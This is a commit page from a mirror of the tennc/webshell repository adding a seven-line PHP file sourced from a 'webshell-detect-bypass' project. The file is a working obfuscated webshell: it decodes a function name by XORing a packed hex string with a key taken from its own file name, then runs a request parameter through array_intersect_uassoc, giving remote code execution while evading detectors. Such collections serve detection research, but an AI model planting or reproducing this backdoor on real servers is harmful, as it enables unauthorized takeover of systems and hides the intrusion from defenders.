mirror of
https://github.com/tennc/webshell.git
synced 2025-12-07 05:11:28 +00:00
Add files via upload
From:https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/php Author:Build by LandGrey
This commit is contained in:
@@ -0,0 +1,7 @@
|
||||
<?php
|
||||
$password = "LandGrey";
|
||||
$key = substr(__FILE__,-5,-4);
|
||||
${"LandGrey"} = $key."Land!";
|
||||
$f = pack("H*", "13"."3f120b1655") ^ $LandGrey;
|
||||
array_intersect_uassoc (array($_REQUEST[$password] => ""), array(1), $f);
|
||||
?>
|
||||
Reference in New Issue
Block a user